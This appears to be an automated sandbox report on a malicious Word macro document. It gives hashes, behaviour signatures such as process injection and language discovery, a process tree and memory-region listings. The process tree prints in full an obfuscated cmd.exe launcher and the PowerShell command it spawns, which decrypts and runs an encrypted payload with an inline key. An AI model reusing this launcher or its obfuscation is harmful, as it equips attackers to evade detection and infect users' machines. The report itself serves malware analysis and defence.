Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 05:41

General

  • Target

    eab06280ca8765bc669aabad584eef2f_JaffaCakes118.doc

  • Size

    133KB

  • MD5

    eab06280ca8765bc669aabad584eef2f

  • SHA1

    8ddbeadaf758bd0c71e586fabe098250035280e8

  • SHA256

    646d34d0bf6e22558a3a5d2787e60786d9d31ee2b2c0e3df19a090c88f2a90f3

  • SHA512

    734442473604f0390568c408787f78797c1738de6c926dbbebd24b8427454dee830b5d9ddfcd76bf4fb5b7791f4caed60fc94ce951dec9f4f8cb5071ec54b620

  • SSDEEP

    1536:Zj2Uk8ywBOn/c+a9E0HxJP/ufSMRZ1AWDZgyV2C8t9rBM:sUtHcb0rP/uhRMpK2CM

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eab06280ca8765bc669aabad584eef2f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" CEhFmGjbRu lNYcfrUfhGJhdhXicOoKcu LFAwwDBfikl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %pYPVBFduCvHQDMU%=ZdtciJwhDrjpUQ&&set %GotSlJBLT%=p&&set %dGIzTPdVR%=o^w&&set %tXriWwjaUHTXqSn%=omjZPMijjfZhS&&set %ouHZAfCOuiKmhL%=!%GotSlJBLT%!&&set %JWoZlBkYZqYOwIm%=GTjuPDzG&&set %zsACpVmAZwRpMB%=e^r&&set %qDiuELItjKfu%=!%dGIzTPdVR%!&&set %TkbGWUpFTr%=s&&set %uBhsHwrWBIKkfzE%=DOPwKKQDs&&set %fjWitFjS%=he&&set %OnqcPWAmV%=ll&&!%ouHZAfCOuiKmhL%!!%qDiuELItjKfu%!!%zsACpVmAZwRpMB%!!%TkbGWUpFTr%!!%fjWitFjS%!!%OnqcPWAmV%! "& ( $vERBosEprEferENCe.tostRinG()[1,3]+'X'-joIN'') ( ( [RuNtimE.inTeRoPseRvICeS.mArshAL]::pTrtOStriNgaNSI( [RuNTIMe.INteroPSERVICEs.MARShAl]::SecuREstrINgtogLOBAlalLoCAnsI($('76492d1116743f0423413b16050a5345MgB8AFcAQwA1AFcARQBhAFoAUQBHAFgAWAB3AGEAbABxAEsAbQBxAHIAZgBJAGcAPQA9AHwAMABjAGMAYQBhADkANgA3AGIAYgBhADIANgA1ADkAOAA5ADkAOQBmAGQAOAA3AGYAMAA4AGQANABmADYAMQA1ADIANQBlADIAZABjADcAZQBiAGEAMwBmAGUAMQBmADIANwA0ADQANwA5AGUANgA3ADQAZABmADIAMgA3ADcANAAzAGMAYQA4AGYAZABkADYAYgBiAGEANwBiADIAYgBmADQANQA5ADcAZgA2AGQAMgA1AGMANAAwAGQAMABlAGYANQA3AGQANABhADAAMQA0AGEAOQA1AGUAOQAyADcAMABiAGEAZQAwADgAMABiAGUAOQBiAGIAMQAxADgAMwBjADQAMgA2AGYAYQBlADUAYQAzADIAZgBhADEAZAA1ADUAZAAwAGYANAA1ADMAZAAwADIAYwAzADMAOQAxAGEAYQA5AGYAYQBkADkAYQBiAGYAYwBkADUAYQAxADEAOQA5AGIAOQA3ADQANABkADUANABlADMAOABiADYAZgA2AGEANwA3ADAAMQBlADQAZgAyAGMAYQA0ADQANAA2ADUANQBiADIAZQA3ADcAMQBkADQAYwAzADUAMQAwAGEAYQA1AGUAMgA4AGEAZgBiADgAMQAyAGQAOQA1ADQAZQAxAGUAMgAwAGUAMwAxADkAOQA0ADYAMgA2ADYAMQBiADkAMQA2ADkAMgA0ADUANAAwAGQAZgA2ADgANQA4ADUAZAAzAGIAZABhAGIAYwBmAGMANQA4ADQAMgAyADUAYgA2AGQAYwA4ADMANQA1ADUAYQBlADMAYQAwAGQANwA2ADYAYQBkAGUAMwAyADIAMgA2ADAAOQA3ADQANgAzADMAYQA2AGEAZgA2AGQAMwA2ADYANQAzAGYAZQA2AGQAZABmADcANwBiAGIANQA3AGQANQBjAGYANABhADUAMQAxAGUANgBmADAAZABiAGEANgA5AGEAOQAwADQAOAA2AGIANABjADUAMgA4ADgAZAAzAGQAYwAzADYAMQBmADAAMQAwADkANQBlADMAZABhAGIAOQA0AGYAOAAwADAAYgBkADEAMAA2ADUAZAA4AGQAOQA4ADYANQBmAGUAOAA5ADIAYwBlAGEAZQAzADAAMQAxAGIAMgA4ADUANgBiAGUAZABmADIANgA5ADAAMgAyADkAMwBiADUAMgBkADAAZABhADQANAAxADEANgBiADUAMgBiADEAMQA3ADIAZAA4ADkAMQA3AGMANQA4AGQAYgBlADcAMgA3ADgAMAA3AGMAYgBlAGQAYwAyAGEAYwA5AGMAMgA3AGIAMwBkADAAMgA2ADQAOAA1AGIAZgBiAGIANQA2ADYAOAAwAGUANAA4ADIAOQA4AGEAYQA5ADUAYwAyAGMANgAyADUAMwA5ADAAZgA4ADAAMgBhADMAZgA3ADEAMAA3AGUAZQA3AGMAZAA4ADgAZQBkAGIAZQAwAGYAYwA4ADQAZgBhADAANQBlADEANAA2AGQANQBlADMAMwBjAGQAYgBiAGQAMwA1AGUANgAxADUAYQAwADgANgBlAGQAYwA5ADYAOAA4ADEAYQAzAGQAMQAxADIAYgBjAGUAZAA2AGEAMQAzADcANwBmADIANwA4ADUAMgA1AGYAZAAyADcAYQBiADQAYQA4AGQAMQA0AGIAZAAxADcAMgBhAGEANgA5AGYAZAAyAGYAOAA1ADIAYgA1ADcAYgA0ADAAMAA2ADAAZABiADUAYgA1ADUANwBmADkAMABkAGQAOABkAGUAMAA1AGIAZAA1AGYANwBjADUANwA0AGIAOQA2AGYAMwBjADYAMQA1ADUAOABlADYAOQBlADAAMAA5AGIANQAzAGUAMgBlAGEAOABmADkAOABmADcANwA1ADMAZAA2ADUAYwA1AGQAMABhADgAZQBlAGUAZgA5ADcANwBiADYAMwA5ADEANAAzADkAMQBjADIAYgAyADkAMwAyADAAOAA3AGIAMQBjAGYAOAA0ADEAYQA2ADgAOQA2AGQANgAzADUAYwBkADEAYgBlAGUAZgA1ADYAZAAzADIAYwAxAGQANgBiADEAZgBlADEANABiADcAMABiADYAMQA4ADYAMAA5ADUAMABmAGIAYQAyADUANQBhAGIAOQA4AGQAYgBlAGQANwA4AGYAZQBiAGQANwBlAGIAOQA3AGQAMgBiADUANgA4AGIANgAyADcANABhAGMAOAA1ADcAMAAxADIAYwA5ADAAMQAwADgANgBkAGQANwBkADEANwAzAGEAOQBkAGYANwBkADEAMAAwAGIANgAzAGYAZgA5ADMAZAAzADUAZABkADcANgBiAGUAOQAyADIAYgA2ADEAZQBjAGEAMgBkAGIAYQAyAGYAMwA1ADgAMgA4AGYAZgA1ADIAYwBiADkAMwBkADYANwAzADAAZgA2ADIAMABlADYAMAA2ADkAMwBiAGMAYwA2AGIAZQA4ADIAMQBmAGIAYgA4AGEAYwAyADgAZgA5ADMANABiADgAMgBmADMAYwBmADMAMgBjADEAOQAyAGUAMAA0ADkAYwAzADcAMQA5ADAAZAA3ADYAMAAyADEAYgAwADkAYQAwAGMAOAAzADkANAAxADQAZgBjADkAMQAwADYAYwA4AGUANwA2AGYANQAxAGEAOAA1ADQANgAxADMANgBmADcAZQA1ADcANQAzAGEANAA1ADYANgBmADEANABmAGIAMQA3ADUANgA3AGIAOQA1ADgAYwA5AGUAOABmADQANQA1ADgAMQBmAGMAOAA1ADAANgAwADMANgBiAGUANQBiADYAZgBlAGIAZAAwADUAOQA5ADEAMwA0ADMAZABiAGUAZABhAGIAZgA4AGMAZQBkADYAMQA4ADYAYgBlADYANgBmADgAOQA5ADcAZQBhADEAOAA0ADIAYwBiADAAMgBhAGMANgBlADEAMwAyAGEANQAwADIAMAA3ADUANQBiADUAZQAxADIANgBmAGQANgA4AGYANwA3AGQAZAAzAGYAZgA5ADYAMAAyADgAMQBmADcAMwAwADUAYgBhAGMAYQAzADUAYwAwAGYAZABjAGEANwA5ADgAOQAwAGIAMQAxADUAMABmADQAOQBlADQAMgAxADAANAAwAGYAZAAwAGMANAAwADcAZAA5AGQAZAAzAGIAMABhADcANQBkADUAZgA5AGEANQBmADgAZAA3ADkAYQA3ADgAZgBjADUANwA5AGEAMQA4ADYAOAA0AGMAMAA1ADQAYQAwADAAOAA3ADgAMAAwADQAMwAxADYAZAA3ADQAZQA0ADcAYwA2AGIAMABiADgANAAzADUANgA4AGYAYQA3AGIAMQA0ADUAZgBlAGMANgBiADUAZgAzAGQAZQBlAGYAMgBhAGYAZAA2ADIANgBmADMAMAAyADIANQBmADYANwAyADYAMAAwAGQAZAAyADkAYgBhAGEAZQBjAGUAOAAxAGMANgAwAGUAYQBkADAAYwA3ADcAOQAwAGYAMAA3ADIANgBjADcANwBiAGYAOAAxADkAZAAwADkANAA2ADgAYwBmADAAOQBmAGIAYQAxADYAMgBkAGUAOABkAGMAYwA4AGYAZAAyADIAYQA5ADEANgBhADkAMQBkADEANQAyADkANQAzADUAZABkADUAZgBjAGQAZAA2AGYANgBkAGEANgBmADAAMQA4AGYANAA5ADIAYgA0AGUAYQA3AGQANwA0ADYAMwBmAGYAYgA3AGQANQBlADUAZgAwAGQAZABkAGEANwAwADcAOAAzAGUANABlADIAYgBiADQANQBmADQANgBiADMAYQA1AGYANgAyADYAMgA2AGYANAA4ADYAMQBkAGYAYQA5ADYAOQA3AGIANAA3ADcAOABlAGIAZQBhAGIAMABkADcAOAAxAGQANwBjADcAOQBkADAAMwBlADgANQBhAGQAYQBmADIAYQA4ADUANQA1ADIANQBhAGUAZQBkADkAMwAyAGQAZQBkAGQAOAAzADcAMAA4AGIANAAxADYAMgBlAGUAZQA5AGQANAAzADEAOAA4ADYAZABjADgAMwBlADUAYQA2AGIAMwA5ADgANgAwADIA'| coNVerTTo-SecUREsTrINg -kE 34,56,154,207,43,77,163,192,141,241,250,175,127,43,79,52)) )) )
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "& ( $vERBosEprEferENCe.tostRinG()[1,3]+'X'-joIN'') ( ( [RuNtimE.inTeRoPseRvICeS.mArshAL]::pTrtOStriNgaNSI( [RuNTIMe.INteroPSERVICEs.MARShAl]::SecuREstrINgtogLOBAlalLoCAnsI($('76492d1116743f0423413b16050a5345MgB8AFcAQwA1AFcARQBhAFoAUQBHAFgAWAB3AGEAbABxAEsAbQBxAHIAZgBJAGcAPQA9AHwAMABjAGMAYQBhADkANgA3AGIAYgBhADIANgA1ADkAOAA5ADkAOQBmAGQAOAA3AGYAMAA4AGQANABmADYAMQA1ADIANQBlADIAZABjADcAZQBiAGEAMwBmAGUAMQBmADIANwA0ADQANwA5AGUANgA3ADQAZABmADIAMgA3ADcANAAzAGMAYQA4AGYAZABkADYAYgBiAGEANwBiADIAYgBmADQANQA5ADcAZgA2AGQAMgA1AGMANAAwAGQAMABlAGYANQA3AGQANABhADAAMQA0AGEAOQA1AGUAOQAyADcAMABiAGEAZQAwADgAMABiAGUAOQBiAGIAMQAxADgAMwBjADQAMgA2AGYAYQBlADUAYQAzADIAZgBhADEAZAA1ADUAZAAwAGYANAA1ADMAZAAwADIAYwAzADMAOQAxAGEAYQA5AGYAYQBkADkAYQBiAGYAYwBkADUAYQAxADEAOQA5AGIAOQA3ADQANABkADUANABlADMAOABiADYAZgA2AGEANwA3ADAAMQBlADQAZgAyAGMAYQA0ADQANAA2ADUANQBiADIAZQA3ADcAMQBkADQAYwAzADUAMQAwAGEAYQA1AGUAMgA4AGEAZgBiADgAMQAyAGQAOQA1ADQAZQAxAGUAMgAwAGUAMwAxADkAOQA0ADYAMgA2ADYAMQBiADkAMQA2ADkAMgA0ADUANAAwAGQAZgA2ADgANQA4ADUAZAAzAGIAZABhAGIAYwBmAGMANQA4ADQAMgAyADUAYgA2AGQAYwA4ADMANQA1ADUAYQBlADMAYQAwAGQANwA2ADYAYQBkAGUAMwAyADIAMgA2ADAAOQA3ADQANgAzADMAYQA2AGEAZgA2AGQAMwA2ADYANQAzAGYAZQA2AGQAZABmADcANwBiAGIANQA3AGQANQBjAGYANABhADUAMQAxAGUANgBmADAAZABiAGEANgA5AGEAOQAwADQAOAA2AGIANABjADUAMgA4ADgAZAAzAGQAYwAzADYAMQBmADAAMQAwADkANQBlADMAZABhAGIAOQA0AGYAOAAwADAAYgBkADEAMAA2ADUAZAA4AGQAOQA4ADYANQBmAGUAOAA5ADIAYwBlAGEAZQAzADAAMQAxAGIAMgA4ADUANgBiAGUAZABmADIANgA5ADAAMgAyADkAMwBiADUAMgBkADAAZABhADQANAAxADEANgBiADUAMgBiADEAMQA3ADIAZAA4ADkAMQA3AGMANQA4AGQAYgBlADcAMgA3ADgAMAA3AGMAYgBlAGQAYwAyAGEAYwA5AGMAMgA3AGIAMwBkADAAMgA2ADQAOAA1AGIAZgBiAGIANQA2ADYAOAAwAGUANAA4ADIAOQA4AGEAYQA5ADUAYwAyAGMANgAyADUAMwA5ADAAZgA4ADAAMgBhADMAZgA3ADEAMAA3AGUAZQA3AGMAZAA4ADgAZQBkAGIAZQAwAGYAYwA4ADQAZgBhADAANQBlADEANAA2AGQANQBlADMAMwBjAGQAYgBiAGQAMwA1AGUANgAxADUAYQAwADgANgBlAGQAYwA5ADYAOAA4ADEAYQAzAGQAMQAxADIAYgBjAGUAZAA2AGEAMQAzADcANwBmADIANwA4ADUAMgA1AGYAZAAyADcAYQBiADQAYQA4AGQAMQA0AGIAZAAxADcAMgBhAGEANgA5AGYAZAAyAGYAOAA1ADIAYgA1ADcAYgA0ADAAMAA2ADAAZABiADUAYgA1ADUANwBmADkAMABkAGQAOABkAGUAMAA1AGIAZAA1AGYANwBjADUANwA0AGIAOQA2AGYAMwBjADYAMQA1ADUAOABlADYAOQBlADAAMAA5AGIANQAzAGUAMgBlAGEAOABmADkAOABmADcANwA1ADMAZAA2ADUAYwA1AGQAMABhADgAZQBlAGUAZgA5ADcANwBiADYAMwA5ADEANAAzADkAMQBjADIAYgAyADkAMwAyADAAOAA3AGIAMQBjAGYAOAA0ADEAYQA2ADgAOQA2AGQANgAzADUAYwBkADEAYgBlAGUAZgA1ADYAZAAzADIAYwAxAGQANgBiADEAZgBlADEANABiADcAMABiADYAMQA4ADYAMAA5ADUAMABmAGIAYQAyADUANQBhAGIAOQA4AGQAYgBlAGQANwA4AGYAZQBiAGQANwBlAGIAOQA3AGQAMgBiADUANgA4AGIANgAyADcANABhAGMAOAA1ADcAMAAxADIAYwA5ADAAMQAwADgANgBkAGQANwBkADEANwAzAGEAOQBkAGYANwBkADEAMAAwAGIANgAzAGYAZgA5ADMAZAAzADUAZABkADcANgBiAGUAOQAyADIAYgA2ADEAZQBjAGEAMgBkAGIAYQAyAGYAMwA1ADgAMgA4AGYAZgA1ADIAYwBiADkAMwBkADYANwAzADAAZgA2ADIAMABlADYAMAA2ADkAMwBiAGMAYwA2AGIAZQA4ADIAMQBmAGIAYgA4AGEAYwAyADgAZgA5ADMANABiADgAMgBmADMAYwBmADMAMgBjADEAOQAyAGUAMAA0ADkAYwAzADcAMQA5ADAAZAA3ADYAMAAyADEAYgAwADkAYQAwAGMAOAAzADkANAAxADQAZgBjADkAMQAwADYAYwA4AGUANwA2AGYANQAxAGEAOAA1ADQANgAxADMANgBmADcAZQA1ADcANQAzAGEANAA1ADYANgBmADEANABmAGIAMQA3ADUANgA3AGIAOQA1ADgAYwA5AGUAOABmADQANQA1ADgAMQBmAGMAOAA1ADAANgAwADMANgBiAGUANQBiADYAZgBlAGIAZAAwADUAOQA5ADEAMwA0ADMAZABiAGUAZABhAGIAZgA4AGMAZQBkADYAMQA4ADYAYgBlADYANgBmADgAOQA5ADcAZQBhADEAOAA0ADIAYwBiADAAMgBhAGMANgBlADEAMwAyAGEANQAwADIAMAA3ADUANQBiADUAZQAxADIANgBmAGQANgA4AGYANwA3AGQAZAAzAGYAZgA5ADYAMAAyADgAMQBmADcAMwAwADUAYgBhAGMAYQAzADUAYwAwAGYAZABjAGEANwA5ADgAOQAwAGIAMQAxADUAMABmADQAOQBlADQAMgAxADAANAAwAGYAZAAwAGMANAAwADcAZAA5AGQAZAAzAGIAMABhADcANQBkADUAZgA5AGEANQBmADgAZAA3ADkAYQA3ADgAZgBjADUANwA5AGEAMQA4ADYAOAA0AGMAMAA1ADQAYQAwADAAOAA3ADgAMAAwADQAMwAxADYAZAA3ADQAZQA0ADcAYwA2AGIAMABiADgANAAzADUANgA4AGYAYQA3AGIAMQA0ADUAZgBlAGMANgBiADUAZgAzAGQAZQBlAGYAMgBhAGYAZAA2ADIANgBmADMAMAAyADIANQBmADYANwAyADYAMAAwAGQAZAAyADkAYgBhAGEAZQBjAGUAOAAxAGMANgAwAGUAYQBkADAAYwA3ADcAOQAwAGYAMAA3ADIANgBjADcANwBiAGYAOAAxADkAZAAwADkANAA2ADgAYwBmADAAOQBmAGIAYQAxADYAMgBkAGUAOABkAGMAYwA4AGYAZAAyADIAYQA5ADEANgBhADkAMQBkADEANQAyADkANQAzADUAZABkADUAZgBjAGQAZAA2AGYANgBkAGEANgBmADAAMQA4AGYANAA5ADIAYgA0AGUAYQA3AGQANwA0ADYAMwBmAGYAYgA3AGQANQBlADUAZgAwAGQAZABkAGEANwAwADcAOAAzAGUANABlADIAYgBiADQANQBmADQANgBiADMAYQA1AGYANgAyADYAMgA2AGYANAA4ADYAMQBkAGYAYQA5ADYAOQA3AGIANAA3ADcAOABlAGIAZQBhAGIAMABkADcAOAAxAGQANwBjADcAOQBkADAAMwBlADgANQBhAGQAYQBmADIAYQA4ADUANQA1ADIANQBhAGUAZQBkADkAMwAyAGQAZQBkAGQAOAAzADcAMAA4AGIANAAxADYAMgBlAGUAZQA5AGQANAAzADEAOAA4ADYAZABjADgAMwBlADUAYQA2AGIAMwA5ADgANgAwADIA'| coNVerTTo-SecUREsTrINg -kE 34,56,154,207,43,77,163,192,141,241,250,175,127,43,79,52)) )) )
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      d2809bc7b5fe447b18120e35adf648ee

      SHA1

      bb978f116954895ab2c45becee2888cc8835a4ad

      SHA256

      12a534c4a55f68577b4e1445524349f646dc3cc3cd8c928dd42297cfdd0cc193

      SHA512

      188b889b6c3be482d2c6b4167b1b3e7ba6d2a6a1355b61bd853bfeee6299486108b27f0c98a6602ba906d35b829eb3ad3ccd38ff7d7a38055585a95ed273f671

    • memory/2468-29-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-14-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-5-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-28-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-8-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-12-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-13-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-27-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-15-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-22-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-40-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-36-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-35-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-25-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-33-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-0-0x000000002F461000-0x000000002F462000-memory.dmp

      Filesize

      4KB

    • memory/2468-6-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-2-0x0000000070BAD000-0x0000000070BB8000-memory.dmp

      Filesize

      44KB

    • memory/2468-34-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-23-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-21-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-20-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-19-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-10-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-9-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-7-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-44-0x0000000070BAD000-0x0000000070BB8000-memory.dmp

      Filesize

      44KB

    • memory/2468-45-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-46-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2468-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2468-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2468-62-0x0000000070BAD000-0x0000000070BB8000-memory.dmp

      Filesize

      44KB

    • memory/2468-63-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB